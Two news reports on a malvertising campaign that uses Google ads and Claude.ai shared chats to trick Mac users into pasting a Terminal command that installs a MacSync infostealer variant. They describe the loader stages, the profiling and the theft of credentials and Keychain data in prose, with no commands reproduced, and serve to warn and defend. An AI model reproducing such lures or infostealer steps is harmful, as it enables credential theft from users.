Hackers exploit Google Ads and Claude.ai shared chats to distribute Mac malware

Hackers abuse Google ads, Claude.ai chats to push Mac malware

Attackers are abusing Google Ads and legitimate Claude.ai shared chats in an active malvertising campaign. Users searching for "Claude mac download" may come across sponsored search results that list claude.ai as the target website, but lead to instructions that install malware on their Mac. The campaign was spotted by Berk Albayrak, a security engineer at Trendyol Group, who shared his findings on LinkedIn. Albayrak identified a Claude.ai shared chat that presents itself as an official "Claude Code on Mac" installation guide, attributed to "Apple Support." The chat walks users through opening Terminal and pasting a command, which silently downloads and runs malware on their Mac. While attempting to verify Albayrak's findings, BleepingComputer landed on a second shared Claude chat carrying out the same attack through entirely separate infrastructure. The two chats follow an identical structure and social engineering approach but use different domains and payloads. Both chats were publicly accessible at the time of writing: The base64 instructions shown in the shared Claude chat download an encoded shell script from domains such as: The 'loader.sh' (served by the second link above) is another set of Gunzip-compressed shell instructions: This compressed shell script runs entirely in memory, leaving little obvious trace on disk. The variant BleepingComputer identified starts by checking whether the machine has Russian or CIS-region keyboard input sources configured. If it does, the script exits without doing anything, sending a quiet cis_blocked status ping to the attacker's server on its way out. Only machines that pass this check get the next stage: Before proceeding further, the script also collects the victim's external IP address, hostname, OS version, and keyboard locale, sending all of it back to the attacker. This kind of victim profiling before payload delivery suggests the operators are being selective about who they target. The script then pulls down a second-stage payload and runs it through osascript, macOS's built-in scripting engine. This gives the attacker remote code execution without ever dropping a traditional application or binary. The variant identified by Albayrak, however, appears to skip the profiling steps. It goes straight to execution. It harvests browser credentials, cookies, and macOS Keychain contents, packages them up, and exfiltrates them to the attacker's server. Researchers have identified this as a variant of the MacSync macOS infostealer: The briskinternet[.]com domain shown above in the variant identified by Albayrak appeared to be down at the time of writing. Malvertising has become a recurring delivery mechanism for malware. BleepingComputer has previously reported on similar campaigns targeting users searching for software like GIMP, where a convincing Google ad would list a legitimate-looking domain but take visitors to a lookalike phishing site instead. This campaign flips that, as there is no fake domain to spot. Both Google ads seen here point to Anthropic's real domain, claude.ai, since the attackers are hosting their malicious instructions inside Claude's own shared chat feature. The destination URL in the ad is genuine. It is not, however, the first time that attackers have abused AI platform shared chats this way. In December, BleepingComputer reported a similar campaign targeting ChatGPT and Grok users. Users should navigate directly to claude.ai for downloading the native Claude app, rather than clicking sponsored search results. The legitimate Claude Code CLI is available through Anthropic's official documentation and does not require pasting commands from a chat interface. It is good practice to generally treat any instructions asking you to paste terminal commands with caution, regardless of where those instructions appear to come from. BleepingComputer reached out to Anthropic and Google for comment prior to publishing.

Malware is now hiding in Google search ads -- here's how to protect yourself

Outside of the office, Josh can be found digging into the latest video games, fantasy books, or tinkering with the newest features in Windows. A new malware campaign has been discovered hiding in people's Google search results when trying to find and download Claude's Mac app. It's a stark reminder of just how pervasive advertisements have become in our day-to-day lives, and why using an ad blocker can be a great way to protect yourself. Related Hackers are disguising malware as Claude Code, and it's easy to fall for the scam Be careful what links you follow Posts By Dave Schafer Malware has always hidden in ads But now they can appear directly in your search results Bad actors have become very good at making malicious downloads look legitimate and even inviting. Sometimes it might be a fake software update, while other times it's a full, convincing workup of a company's support website. And as is the case with a new malware currently making the rounds, it could even be the sponsored ad that appears at the top of your Google search results. This newest trend is picking up on the popularity of AI-powered apps like Claude, which has become huge thanks to the release of its Cowork function, which is great at automating your job, and Claude Code. The latest threat targets people looking to use Claude on Mac and was discovered by security engineer Berk Albayrak, who works with the Trendyol Group. Albayrak shared his findings on LinkedIn, noting that the malware-ridden ad pops up when users search for 'Claude download mac' on Google. If you searched for that term, and then clicked on the infected ad, it would lead you to a legitimate claude.ai page which has instructed for installing the malware embedded in the page. It's a very common way of delivering malware, as it asks those who click on it to paste a set of commands into Terminal, which then downloads the infected files to their device. But this campaign isn't just happening across one source, either, as BleepingComputer also discovered a second shared Claude chat being distributed in the same way. What makes malware like this latest Claude malware so terrifying for everyday people, is the fact that it looks to run entirely in your computer's memory, thus leaving little trace on your disk. That can make it harder to track down and remove. Ads have become a hotbed for malware Blocking them is one of the only ways to truly protect yourself There's no arguing that ads have become rampant on the internet. For many websites and creators, these are a way to keep the lights on. And our reliance on those sources to help drive income has made them a perfect way for threat actors to try to get some kind of gain from it. Subscribe to our newsletter for ad-based malware tips Keep your devices safe - subscribe to our newsletter for clear, practical coverage of ad-borne threats, ad-blocker recommendations, and steps to verify authentic app downloads so you can avoid malicious installers. Get Updates By subscribing, you agree to receive newsletter and marketing emails, and accept our Terms of Use and Privacy Policy. You can unsubscribe anytime. If you don't use an ad blocker already -- and there are good reasons not to, considering YouTube has launched several campaigns against their use -- it might not be a bad idea to set one up. There are several browser extensions you can use to block annoying ads, and most ad blockers have a way to allowlist different sites, so you can still block out the bad while supporting the good. If you're using an Android phone, then you can change DNS settings to block ads and other annoying content, too. Some browsers, like Opera (pictured above) even come with built-in ad blocking systems. Claude Developer Anthropic PBC Price model Free, subscription available Claude is an advanced artificial intelligence assistant developed by Anthropic. Built on Constitutional AI principles, it excels at complex reasoning, sophisticated writing, and professional-grade coding assistance. See at App Store See at Google Play Store See at Claude Expand Collapse Finally, if you're looking for an official download for an app, it's always best to start at the source. And, if a page asks you to paste a command into Terminal on Mac or Command Prompt on Windows, then it's likely not something you'll want to follow through with, as it could put your device at risk.